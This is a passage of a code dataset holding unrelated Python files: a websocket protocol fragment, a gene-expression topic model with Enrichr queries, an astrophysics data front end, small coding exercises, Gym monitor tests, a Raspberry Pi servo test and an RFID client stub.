self.transport.resume_reading()\r\n return message\r\n\r\n def close_protocol(self):\r\n # To close the connection when clean up.\r\n\r\n if self.handshake_complete is True:\r\n message = {\"type\": \"websocket.disconnect\", \"code\": 1012}\r\n self.queue.put_nowait(message)\r\n\r\n event = wsproto.events.CloseConnection(code=1012)\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n else:\r\n headers = [\r\n (b\"content-type\", b\"text/plain; charset=utf-8\"),\r\n (b\"connection\", b\"close\"),\r\n ]\r\n output = self.connection.send(\r\n wsproto.events.RejectConnection(\r\n status_code=500, headers=headers, has_body=True\r\n )\r\n )\r\n output += self.connection.send(\r\n wsproto.events.RejectData(data=b\"Internal Server Error\")\r\n )\r\n self.transport.write(output)\r\n self.transport.close()\r\n","repo_name":"ArtyTheDev/hatsu","sub_path":"hatsu/protocols/websocket_wsproto.py","file_name":"websocket_wsproto.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9430313389","text":"\nfrom os import stat\nimport numpy as np\nimport pyro\nfrom pyro import poutine\nimport pyro.distributions as dist\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributions.constraints as constraints\nfrom tqdm import tqdm\nimport warnings\n\nfrom scipy.sparse import isspmatrix\nfrom kladi.matrix_models.scipm_base import BaseModel, get_fc_stack\nimport configparser\nimport requests\nimport json\nfrom itertools import zip_longest\nimport matplotlib.pyplot as plt\nimport logging\nfrom math import ceil\nfrom kladi.core.plot_utils import map_plot\nfrom functools import partial\nfrom kladi.matrix_models.scipm_base import Decoder\nfrom pyro.contrib.autoname import scope\n\nconfig = configparser.ConfigParser()\nconfig.read('kladi/matrix_models/config.ini')\n\nlogger = logging.getLogger(__name__)\n\ndef grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef compact_string(x, max_wordlen = 4, join_spacer = ' ', sep = ' '):\n return '\\n'.join(\n [\n join_spacer.join([x for x in segment if not x == '']) for segment in grouper(x.split(sep), max_wordlen, fillvalue='')\n ]\n )\n\nclass GeneDevianceModel:\n\n def __init__(self, highly_variable):\n self.highly_variable = highly_variable\n\n def fit(self, y_ij):\n \n y_ij = y_ij[:, self.highly_variable]\n self.pi_j_hat = y_ij.sum(axis = 0)/y_ij.sum()\n\n return self\n\n def set_pi(self, pi):\n self.pi_j_hat = pi\n\n def transform(self, y_ij):\n \n y_ij = y_ij[:, self.highly_variable]\n \n n_i = y_ij.sum(axis = 1, keepdims = True)\n\n mu_ij_hat = n_i * self.pi_j_hat[np.newaxis, :]\n\n count_dif = n_i - y_ij\n expected_count_dif = n_i - mu_ij_hat\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n r_ij = np.multiply(\n np.sign(y_ij - mu_ij_hat), \n np.sqrt(\n np.where(y_ij > 0, 2 * np.multiply(y_ij, np.log(y_ij / mu_ij_hat)), 0) + \\\n 2 * np.multiply(count_dif, np.log(count_dif / expected_count_dif))\n )\n )\n\n return np.clip(np.nan_to_num(r_ij), -10, 10)\n\n\nclass ExpressionEncoder(nn.Module):\n\n def __init__(self, num_genes, num_topics, hidden, dropout, num_layers):\n super().__init__()\n output_batchnorm_size = 2*num_topics + 2\n\n self.num_topics = num_topics\n self.fc_layers = get_fc_stack(\n layer_dims = [num_genes + 1, *[hidden]*(num_layers-1), output_batchnorm_size],\n dropout = dropout, skip_nonlin = True\n )\n \n def forward(self, X):\n\n X = self.fc_layers(X)\n\n theta_loc = X[:, :self.num_topics]\n theta_scale = F.softplus(X[:, self.num_topics:(2*self.num_topics)])# + 1e-5\n\n rd_loc = X[:,-2].reshape((-1,1))\n rd_scale = F.softplus(X[:,-1]).reshape((-1,1))# + 1e-5\n\n return theta_loc, theta_scale, rd_loc, rd_scale\n\n\nclass ExpressionModel(BaseModel):\n '''\n Class\n '''\n \n def __init__(self, genes, highly_variable = None, num_modules = 15, decoder_dropout = 0.2, \n encoder_dropout = 0.1, hidden = 128, use_cuda = True, num_layers = 3, seed = None):\n '''\n Initialize ExpressionModel instance. \n\n Example:\n\n >> genes[:3]\n ['GATA3', 'WNT3', 'CDK8']\n\n >> highly_variable[:3]\n np.array([True, False, False], dtype = bool)\n\n >> expr_model = ExpressionModel(genes, highly_variable = highly_variable, num_modules = 10)\n\n\n Args:\n genes (list, np.ndarray): Gene names / column names for count matrix, length must match dimension 2 of count matrix\n highly_variable (np.ndarray): boolean mask of same length as ``genes``. Genes flagged with ``True`` will be used as features for encoder. All genes will be used as features for decoder.\n This allows one to impute many genes while only learning modules on highly variable genes, decreasing model complexity and training time.\n num_modules (int): number of gene modules to find\n initial_counts (int): sparsity parameter, related to pseudocounts of dirichlet prior. Increasing will lead to denser cell latent variables, decreasing will lead to more sparse latent variables.\n dropout (float between 0,1): dropout rate for model.\n hidden (int): number of nodes in encoder hidden layers.\n use_cuda (bool): use CUDA to accelerate training on GPU (if GPU is available).\n\n Returns:\n ExpressionModel\n '''\n\n assert(isinstance(genes, (list, np.ndarray)))\n self.genes = np.ravel(np.array(genes))\n \n kwargs = dict(\n num_modules = num_modules,\n num_exog_features = len(self.genes),\n highly_variable = highly_variable,\n hidden = hidden,\n num_layers = num_layers,\n decoder_dropout = decoder_dropout,\n encoder_dropout = encoder_dropout,\n use_cuda = use_cuda,\n seed = seed,\n )\n \n super().__init__(ExpressionEncoder, Decoder, **kwargs)\n\n @scope(prefix= 'rna')\n def model(self, raw_expr, encoded_expr, read_depth, anneal_factor = 1.):\n\n pyro.module(\"decoder\", self.decoder)\n\n self.dispersion = pyro.param(\"dispersion\", torch.tensor(5.) * torch.ones(self.num_exog_features), \n constraint = constraints.positive).to(self.device)\n\n _alpha, _beta = self._get_gamma_parameters(self.I, self.num_topics)\n with pyro.plate(\"topics\", self.num_topics):\n initial_counts = pyro.sample(\"a\", dist.Gamma(self._to_tensor(_alpha), self._to_tensor(_beta)))\n\n theta_loc = self._get_prior_mu(initial_counts, self.K)\n theta_scale = self._get_prior_std(initial_counts, self.K)\n\n #print(theta_loc, theta_scale)\n \n with pyro.plate(\"cells\", encoded_expr.shape[0]):\n\n # Dirichlet prior 𝑝(𝜃|𝛼) is replaced by a log-normal distribution\n with poutine.scale(None, anneal_factor):\n theta = pyro.sample(\n \"theta\", dist.LogNormal(theta_loc, theta_scale).to_event(1))\n\n read_scale = pyro.sample('read_depth', dist.LogNormal(torch.log(read_depth), 1.).to_event(1))\n\n theta = theta/theta.sum(-1, keepdim = True)\n expr_rate = self.decoder(theta)\n\n mu = torch.multiply(read_scale, expr_rate)\n p = torch.minimum(mu / (mu + self.dispersion), self.max_prob)\n\n pyro.sample('obs', dist.NegativeBinomial(total_count = self.dispersion, probs = p).to_event(1), obs = raw_expr)\n\n @scope(prefix= 'rna')\n def guide(self, raw_expr, encoded_expr, read_depth, anneal_factor = 1.):\n\n pyro.module(\"encoder\", self.encoder)\n\n _counts_mu, _counts_var = self._get_lognormal_parameters_from_moments(*self._get_gamma_moments(self.I, self.num_topics))\n counts_mu = pyro.param('counts_mu', _counts_mu * encoded_expr.new_ones((self.num_topics,))).to(self.device)\n counts_std = pyro.param('counts_std', np.sqrt(_counts_var) * encoded_expr.new_ones((self.num_topics,)), \n constraint = constraints.positive).to(self.device)\n\n with pyro.plate(\"topics\", self.num_topics) as k:\n initial_counts = pyro.sample(\"a\", dist.LogNormal(counts_mu[k], counts_std[k]))\n\n \n with pyro.plate(\"cells\", encoded_expr.shape[0]):\n # Dirichlet prior 𝑝(𝜃|𝛼) is replaced by a log-normal distribution,\n # where μ and Σ are the encoder network outputs\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n with poutine.scale(None, anneal_factor):\n theta = pyro.sample(\n \"theta\", dist.LogNormal(theta_loc, theta_scale).to_event(1)\n )\n\n read_depth = pyro.sample(\n \"read_depth\", dist.LogNormal(rd_loc.reshape((-1,1)), rd_scale.reshape((-1,1))).to_event(1)\n )\n \n\n def _get_expression_distribution_parameters(self, raw_expr, batch_size = 32):\n \n def detach(x):\n return x.detach().cpu().numpy()\n\n X = self._validate_data(raw_expr)\n assert(isinstance(batch_size, int) and batch_size > 0)\n\n rd_locs, rd_scales, softmax_denoms = [], [], []\n for i,batch in enumerate(self._get_batches(X, batch_size = batch_size)):\n raw_expr, encoded_expr, read_depth = batch\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n rd_locs.append(detach(rd_loc))\n rd_scales.append(detach(rd_scale))\n\n theta = theta_loc.exp()/theta_loc.exp().sum(-1, keepdim = True)\n softmax_denoms.append(\n detach(self.decoder.get_softmax_denom(theta))\n )\n\n rd_loc = np.concatenate(rd_locs, 0)\n rd_scale = np.concatenate(rd_scales, 0)\n softmax_denom = np.concatenate(softmax_denoms, 0)\n return rd_loc, rd_scale, softmax_denom\n\n\n def _get_latent_MAP(self, raw_expr, encoded_expr, read_depth):\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n Z = theta_loc.cpu().detach().numpy()\n return np.exp(Z)/np.exp(Z).sum(-1, keepdims = True)\n\n\n def _get_batches(self, count_matrix, batch_size = 32, bar = False, training = True, desc = None):\n \n N = len(count_matrix)\n \n try:\n self.deviance_model\n except AttributeError:\n self.deviance_model = GeneDevianceModel(self.highly_variable).fit(count_matrix)\n\n for batch_start, batch_end in self._iterate_batch_idx(N, batch_size):\n yield self._featurize(count_matrix[batch_start : batch_end, :])\n\n def _validate_data(self, X):\n assert(isinstance(X, np.ndarray) or isspmatrix(X))\n \n if isspmatrix(X):\n X = np.array(X.todense())\n\n assert(len(X.shape) == 2)\n assert(X.shape[1] == self.num_exog_features)\n \n assert(np.isclose(X.astype(np.int64), X, 1e-1).all()), 'Input data must be raw transcript counts, represented as integers. Provided data contains non-integer values.'\n\n return X.astype(np.float32)\n\n def impute(self, latent_compositions):\n '''\n Compute imputed gene expression values using cells' latent variable representations.\n\n Args:\n latent_compositions (np.npdarray): Cells x num_modules array, each row must sum to 1\n\n Returns:\n (np.ndarray): imputed expression, Cells x num_genes matrix\n '''\n\n assert(isinstance(latent_compositions, np.ndarray))\n assert(len(latent_compositions.shape) == 2)\n assert(latent_compositions.shape[1] == self.num_topics)\n assert(np.isclose(latent_compositions.sum(-1), 1).all())\n\n latent_compositions = self._to_tensor(latent_compositions)\n\n return self.decoder(latent_compositions).cpu().detach().numpy()\n\n def _get_save_data(self):\n return dict(\n pi = self.deviance_model.pi_j_hat,\n **super()._get_save_data()\n )\n\n def _load_save_data(self, data):\n super()._load_save_data(data)\n\n self.deviance_model = GeneDevianceModel(self.highly_variable)\n self.deviance_model.set_pi(data['pi'])\n\n return self\n\n\n def _featurize(self, count_matrix):\n\n encoded_counts = self.deviance_model.transform(count_matrix)\n read_depth = count_matrix.sum(-1, keepdims = True)\n\n encoded_counts = np.hstack([encoded_counts, np.log(read_depth)])\n\n return self._to_tensor(count_matrix), self._to_tensor(encoded_counts), self._to_tensor(read_depth)\n\n def rank_genes(self, module_num):\n '''\n Ranks genes according to their activation in module ``module_num``. Sorted from most suppressed to most activated.\n\n Args:\n module_num (int): For which module to rank genes\n\n Returns:\n np.ndarray: sorted array of gene names in order from most suppressed to most activated given the specified module\n '''\n assert(isinstance(module_num, int) and module_num < self.num_topics and module_num >= 0)\n\n return self.genes[np.argsort(self._score_features()[module_num, :])]\n\n def get_top_genes(self, module_num, top_n = None):\n '''\n For a module, return the top n genes that are most activated.\n\n Args:\n module_num (int): For which module to return most activated genes\n top_n (int): number of genes to return\n\n Returns\n (np.ndarray): Names of top n genes, sorted from least to most activated\n '''\n\n if top_n is None:\n top_genes_mask = self._score_features()[module_num,:] > 2\n\n if top_genes_mask.sum() > 200:\n return self.genes[top_genes_mask]\n else:\n top_n = 200\n\n assert(isinstance(top_n, int) and top_n > 0)\n return self.rank_genes(module_num)[-top_n : ]\n\n\n def rank_modules(self, gene):\n '''\n For a gene, rank how much its expression is activated by each module\n\n Args:\n gene (str): name of gene\n \n Raises:\n AssertionError: if ``gene`` is not in self.genes\n \n Returns:\n (list): of format [(module_num, activation), ...]\n '''\n \n assert(gene in self.genes)\n\n gene_idx = np.argwhere(self.genes == gene)[0]\n return list(sorted(zip(range(self.num_topics), self._score_features()[:, gene_idx]), key = lambda x : x[1]))\n \n\n def post_genelist(self, module_num, top_n = None):\n '''\n Post genelist to Enrichr, recieve genelist ID for later retreival.\n\n Args:\n module_num (int): which module's top genes to post\n top_n_genes (int): number of genes to post\n\n Returns:\n enrichr_id (str): unique ID of genelist for retreival with ``get_enrichments`` or ``get_ontology``\n '''\n\n top_genes = '\\n'.join(self.get_top_genes(module_num, top_n=top_n))\n\n enrichr_url = config.get('Enrichr','url')\n post_endpoint = config.get('Enrichr','post')\n\n payload = {\n 'list': (None, top_genes),\n }\n\n logger.info('Querying Enrichr with module {} genes.'.format(str(module_num)))\n response = requests.post(enrichr_url + post_endpoint, files=payload)\n if not response.ok:\n raise Exception('Error analyzing gene list')\n\n list_id = json.loads(response.text)['userListId']\n return list_id\n\n def get_ontology(self, list_id, ontology = 'WikiPathways_2019_Human'):\n '''\n Fetches the gene-set enrichments for a genelist in a certain ontology from Enrichr\n\n Args:\n list_id (str): unique ID of genelist from ``post_genelist``\n ontology (str, default = Wikipathways_2019_Human): For which ontology to download results\n\n Returns:\n (dict): enrichments, with format:\n\n {\n ontology: {\n rank : [...],\n term : [...],\n pvalue : [...],\n zscore : [...],\n combined_score : [...],\n genes : [...],\n adj_pvalue : [...]\n }\n\n }\n '''\n\n enrichr_url = config.get('Enrichr','url')\n get_endpoint = config.get('Enrichr','get').format(list_id = list_id, ontology = ontology)\n\n response = requests.get(enrichr_url + get_endpoint)\n if not response.ok:\n raise Exception('Error fetching enrichment results')\n \n data = json.loads(response.text)[ontology]\n\n headers = config.get('Enrichr','results_headers').split(',')\n \n return {ontology : [dict(zip(headers, x)) for x in data]}\n\n\n def get_enrichments(self, list_id, ontologies = config.get('Enrichr','ontologies').split(',')):\n '''\n Fetches the gene-set enrichments for a genelist from ontologies listed\n\n Args:\n list_id (str): unique ID of genelist from ``post_genelist``\n ontologies (list, default in kladi/matrix_models/config.ini): or which ontologies to download results\n\n Returns:\n (dict): enrichments, with format:\n\n {\n ontology: {\n rank : [...],\n term : [...],\n pvalue : [...],\n zscore : [...],\n combined_score : [...],\n genes : [...],\n adj_pvalue : [...]\n }\n ...\n }\n '''\n\n logger.info('Downloading results ...')\n\n enrichments = dict()\n for ontology in ontologies:\n enrichments.update(self.get_ontology(list_id, ontology=ontology))\n\n return enrichments\n\n @staticmethod\n def _enrichment_plot(ax, ontology, results,*,\n text_color, show_top, barcolor, show_genes, max_genes):\n\n terms, genes, pvals = [],[],[]\n for result in results[:show_top]:\n \n terms.append(\n compact_string(result['term'])\n ) \n genes.append(' '.join(result['genes'][:max_genes]))\n pvals.append(-np.log10(result['pvalue']))\n \n ax.barh(np.arange(len(terms)), pvals, color=barcolor)\n ax.set_yticks(np.arange(len(terms)))\n ax.set_yticklabels(terms)\n ax.invert_yaxis()\n ax.set(title = ontology, xlabel = '-log10 pvalue')\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n \n if show_genes:\n for j, p in enumerate(ax.patches):\n _y = p.get_y() + p.get_height() - p.get_height()/3\n ax.text(0.1, _y, compact_string(genes[j], max_wordlen=10, join_spacer = ', '), ha=\"left\", color = text_color)\n\n\n def plot_enrichments(self, enrichment_results, show_genes = True, show_top = 5, barcolor = 'lightgrey',\n text_color = 'black', return_fig = False, enrichments_per_row = 2, height = 4, aspect = 2.5, max_genes = 15):\n '''\n Make plot of geneset enrichments given results from ``get_ontology`` or ``get_enrichments``.\n\n Example:\n\n post_id = expr_model.post_genelist(0) #post top 250 module 0 genes\n enrichments = expr_model.get_enrichments(post_id)\n expr_model.plot_enrichments(enrichments)\n\n Args:\n enrichment_results (dict): output from ``get_ontology`` or ``get_enrichments``\n show_genes (bool): overlay gene names on top of bars\n show_top (int): plot top n enrichment results\n barcolor (color): color of barplot bars\n text_color (text_color): color of text on barplot bars\n return_fig (bool): return fig and axes objects\n enrichments_per_row (int): number of plots per row\n height (float): height of each plot\n aspect (float): multiplier for width of each plot, width = aspect * height\n max_genes (int): maximum number of genes to display on bar\n\n Returns (if return_fig is True):\n matplotlib.figure, matplotlib.axes.Axes\n\n '''\n \n func = partial(self._enrichment_plot, text_color = text_color, \n show_top = show_top, barcolor = barcolor, show_genes = show_genes, max_genes = max_genes)\n\n fig, ax = map_plot(func, enrichment_results.keys(), enrichment_results.values(), plots_per_row = enrichments_per_row, \n height =height, aspect = aspect) \n \n plt.tight_layout()\n if return_fig:\n return fig, ax","repo_name":"AllenWLynch/Kladi","sub_path":"kladi/matrix_models/expression_model.py","file_name":"expression_model.py","file_ext":"py","file_size_in_byte":20162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7471928919","text":"from __future__ import print_function\nimport numpy as np\nimport yt\nimport powderday.config as cfg\n\nfrom yt.data_objects.particle_filters import add_particle_filter\n\n\ndef enzo_field_add(fname,ds = None, starages = False):\n\n def _starmetals(field,data):\n return data[('newstars','metallicity_fraction')]\n\n def _starcoordinates(field,data):\n #set units of cm then tack them back on because the column_stack loses them\n xpos = data[ ('newstars', 'particle_position_x')].in_units(\"cm\")\n ypos = data[ ('newstars', 'particle_position_y')].in_units(\"cm\")\n zpos = data[ ('newstars', 'particle_position_z')].in_units(\"cm\")\n coordinates = np.column_stack((xpos,ypos,zpos))\n coordinates = data.ds.arr(coordinates,\"cm\")\n return coordinates\n\n def _stellarages(field,data):\n age = ds.current_time.in_units('Gyr')-data[('newstars', 'creation_time')].in_units('Gyr')\n age[np.where(age < 1.e-3)[0]] = 1.e-3\n return age\n\n def _starmasses(field,data):\n return data[('newstars', 'particle_mass')]\n\n def _gasdensity(field,data):\n return data[('gas', 'density')]\n \n def _gasmetals(field,data):\n return data[ ('gas', 'metallicity')]\n\n def _gasmasses(field,data):\n return data[('gas','cell_mass')]\n\n def _gasfh2(field, data):\n try: return data[('gas', 'FractionH2')]\n except: return data[('gas', 'metallicity')]*0. #just some dimensionless array\n \n\n #load the ds\n if fname != None:\n ds = yt.load(fname)\n ds.index\n\n #set up particle_filters to figure out which particles are stars.\n #we'll call particles that have ages > 0 stars.\n\n def newstars(pfilter,data):\n age = data[pfilter.filtered_type,\"creation_time\"]\n filter = age.in_units('Gyr') > 0\n return filter\n\n\n \n add_particle_filter(\"newstars\",function=newstars,filtered_type='all',requires=[\"creation_time\"])\n ds.add_particle_filter(\"newstars\")\n ad = ds.all_data()\n\n\n\n\n ds.add_field(('star','metals'),function=_starmetals,units=\"code_metallicity\",sampling_type='particle')\n ds.add_field(('star','coordinates'),function=_starcoordinates,units=\"cm\",sampling_type='particle')\n ds.add_field(('stellar','ages'),function=_stellarages,units='Gyr',sampling_type='particle')\n ds.add_field(('star','masses'),function=_starmasses,units='g',sampling_type='particle')\n ds.add_field(('gas','density'),function=_gasdensity,units='g/cm**3',sampling_type='cell')\n ds.add_field(('gas','metals'),function=_gasmetals,units=\"code_metallicity\",sampling_type='cell')\n ds.add_field(('gas','fh2'),function=_gasfh2,units='dimensionless',sampling_type='cell')\n ds.add_field(('gas','masses'),function=_gasmasses,units='g',sampling_type='cell')\n \n ad = ds.all_data()\n\n return ds\n","repo_name":"dnarayanan/powderday","sub_path":"powderday/front_ends/enzo2pd.py","file_name":"enzo2pd.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"12615235725","text":"class Solution:\n def maxArea(self, height: List[int]) -> int:\n lp = 0\n rp = len(height) - 1\n max_area = 0\n\n\n while lp < rp:\n left_height = height[lp]\n right_height = height[rp]\n width = rp - lp\n if left_height < right_height:\n area = left_height * width \n max_area = max(max_area, area)\n lp += 1\n elif left_height >= right_height:\n area = right_height * width\n max_area = max(max_area, area)\n rp -= 1\n return max_area\n \n\n ","repo_name":"Elliott-Chong/LeetCode","sub_path":"12-Container-With-Most-Water/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13504412445","text":"import time\nimport pigpio\nimport pygame\nfrom adafruit_servokit import ServoKit\n\npi = pigpio.pi()\n \npygame.init()\n \n# Loop until the user clicks the close button.\ndone = False\n \n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n \n# Initialize the joysticks\nj = pygame.joystick.Joystick(0)\nj.init()\n\nkit = ServoKit(channels=8)\n\nmotor = 4\n\nwhile not done:\n # EVENT PROCESSING STEP\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.JOYBUTTONDOWN:\n if j.get_button(8):\n pi.set_servo_pulsewidth(4, 1000) # off\n time.sleep(3) \n print(event.button)\n if j.get_button(9):\n pi.set_servo_pulsewidth(4, 1500) # 50% power\n time.sleep(3) \n print(event.button)\n if j.get_button(0):\n pi.set_servo_pulsewidth(4, 1800) # 80% power\n time.sleep(3) \n print(event.button)\n \n if j.get_axis(2):\n kit.servo[1].angle = 0 \n print(event.axis)\n if event.type == pygame.JOYBUTTONUP:\n print(\"Joystick button released.\")\n \n if event.type == pygame.JOYAXISMOTION:\n if j.get_axis(2):\n kit.servo[0].angle = 0 \n print(event.axis)\n if j.get_axis(2):\n kit.servo[0].angle = 0 \n print(event.axis)\npi.stop()\n","repo_name":"nigel-otieno/RPI_Plane-test","sub_path":"brushless_motor_test.py","file_name":"brushless_motor_test.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3869776640","text":"#!/usr/bin/python3\n\"\"\"\nnew Class that inherits from rectangle\n\"\"\"\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"\n this inherits from rectangle\n \"\"\"\n def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n\n def __str__(s):\n return (\n f\"[Square] ({s.id}) {s.x}/{s.y} - {s.width}\"\n )\n\n @property\n def size(self):\n \"\"\"get size\"\"\"\n return self.width\n\n @size.setter\n def size(self, value):\n \"\"\"set size to width and height\"\"\"\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n \"\"\"function to assing newly attrs\"\"\"\n i = 0\n if args is not None and len(args) != 0:\n for arg in args:\n if i == 0:\n self.id = arg\n if i == 1:\n self.size = arg\n if i == 2:\n self.x = arg\n if i == 3:\n self.y = arg\n i += 1\n else:\n if kwargs is not None and len(kwargs) != 0:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n if key == \"size\":\n self.width = value\n if key == \"x\":\n self.x = value\n if key == \"y\":\n self.y = value\n\n def to_dictionary(self):\n \"\"\"__dict__ representation of Square\"\"\"\n return {\"id\": self.id, \"size\": self.width, \"x\": self.x, \"y\": self.y}\n","repo_name":"sanei1509/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17133155291","text":"import glob\nimport os\n\nimport gym\nfrom gym import error, spaces\nfrom gym import monitoring\nfrom gym.monitoring import monitor\nfrom gym.monitoring.tests import helpers\n\nclass FakeEnv(gym.Env):\n def _render(self, close=True):\n raise RuntimeError('Raising')\n\ndef test_monitor_filename():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.monitor.close()\n\n manifests = glob.glob(os.path.join(temp, '*.manifest.*'))\n assert len(manifests) == 1\n\ndef test_write_upon_reset_false():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False, write_upon_reset=False)\n env.reset()\n\n files = glob.glob(os.path.join(temp, '*'))\n assert not files, \"Files: {}\".format(files)\n\n env.monitor.close()\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0\n\ndef test_write_upon_reset_true():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False, write_upon_reset=True)\n env.reset()\n\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0, \"Files: {}\".format(files)\n\n env.monitor.close()\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0\n\ndef test_close_monitor():\n with helpers.tempdir() as temp:\n env = FakeEnv()\n env.monitor.start(temp)\n env.monitor.close()\n\n manifests = monitor.detect_training_manifests(temp)\n assert len(manifests) == 1\n\ndef test_video_callable_true_not_allowed():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n try:\n env.monitor.start(temp, video_callable=True)\n except error.Error:\n pass\n else:\n assert False\n\ndef test_video_callable_false_does_not_record():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False)\n env.reset()\n env.monitor.close()\n results = monitoring.load_results(temp)\n assert len(results['videos']) == 0\n\ndef test_video_callable_records_videos():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.reset()\n env.monitor.close()\n results = monitoring.load_results(temp)\n assert len(results['videos']) == 1, \"Videos: {}\".format(results['videos'])\n\ndef test_env_reuse():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.monitor.close()\n\n env.monitor.start(temp, force=True)\n env.reset()\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n env.monitor.close()\n\n results = monitor.load_results(temp)\n assert results['episode_lengths'] == [2], 'Results: {}'.format(results)\n\nclass AutoresetEnv(gym.Env):\n metadata = {'semantics.autoreset': True}\n\n def __init__(self):\n self.action_space = spaces.Discrete(1)\n self.observation_space = spaces.Discrete(1)\n\n def _reset(self):\n return 0\n\n def _step(self, action):\n return 0, 0, False, {}\n\ngym.envs.register(\n id='Autoreset-v0',\n entry_point='gym.monitoring.tests.test_monitor:AutoresetEnv',\n timestep_limit=2,\n)\ndef test_env_reuse():\n with helpers.tempdir() as temp:\n env = gym.make('Autoreset-v0')\n env.monitor.start(temp)\n\n env.reset()\n\n env.step(None)\n _, _, done, _ = env.step(None)\n assert done\n\n env.step(None)\n _, _, done, _ = env.step(None)\n assert done\n\ndef test_no_monitor_reset_unless_done():\n def assert_reset_raises(env):\n errored = False\n try:\n env.reset()\n except error.Error:\n errored = True\n assert errored, \"Env allowed a reset when it shouldn't have\"\n\n with helpers.tempdir() as temp:\n # Make sure we can reset as we please without monitor\n env = gym.make('CartPole-v0')\n env.reset()\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n env.reset()\n\n # can reset once as soon as we start\n env.monitor.start(temp, video_callable=False)\n env.reset()\n assert_reset_raises(env)\n\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n assert_reset_raises(env)\n\n # should allow resets after the episode is done\n d = False\n while not d:\n _, _, d, _ = env.step(env.action_space.sample())\n\n env.reset()\n\n env.step(env.action_space.sample())\n assert_reset_raises(env)\n\n env.monitor.close()\n\ndef test_only_complete_episodes_written():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n\n env.monitor.start(temp, video_callable=False)\n env.reset()\n d = False\n while not d:\n _, _, d, _ = env.step(env.action_space.sample())\n\n env.reset()\n env.step(env.action_space.sample())\n\n env.monitor.close()\n\n # Only 1 episode should be written\n results = monitoring.load_results(temp)\n assert len(results['episode_lengths']) == 1, \"Found {} episodes written; expecting 1\".format(len(results['episode_lengths']))\n","repo_name":"wyndwarrior/imitation_from_observation","sub_path":"gym/monitoring/tests/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"72"} +{"seq_id":"23007908067","text":"\"\"\" \n\nMetrobus client server code \n\nThis module act as a standalone client, querying the \nselected node for recharges. This runs on a Le Potato\n\nFor research purposes and hardware limitations, this server\nqueries to the DTN CLIENT RECHARGE server for the available nodes \ndirections. \n\nHowever, once having that information. To check if a node\nhas a specific recharge, the server will use that information \nto then query to the INDIVIDUAL NODE AGENT SERVER. \n\nOnce queried, if, there's a recharge, then this server enables\nRFID module to write the new recharge status in the tag. \n\n\"\"\"\n\n\nfrom flask import Flask, render_template, request\nimport requests\nimport json\nfrom uuid import uuid4\nimport os\nfrom flask_sock import Sock\n\nimport binascii\nimport time\n\nfrom pn532pi import Pn532, pn532\nfrom pn532pi import Pn532I2c\n\n#set the communication interface to I2C\nPN532_I2C = Pn532I2c(1)\nnfc = Pn532(PN532_I2C)\n\n\n#search for pn532 chipset\ndef setup():\n print(\"-------Looking for PN532--------\")\n\n nfc.begin()\n\n versiondata = nfc.getFirmwareVersion()\n if not versiondata:\n print(\"Didn't find PN53x board\")\n raise RuntimeError(\"Didn't find PN53x board\") # halt\n\n # Got ok data, print it out!\n print(\"Found chip PN5 {:#x} Firmware ver. {:d}.{:d}\".format((versiondata >> 24) & 0xFF, (versiondata >> 16) & 0xFF,\n (versiondata >> 8) & 0xFF))\n\n # configure board to read RFID tags\n nfc.SAMConfig()\n\n\nDTN_CLIENT_RECHARGE_SERVER_ADDRESS = os.getenv(\n 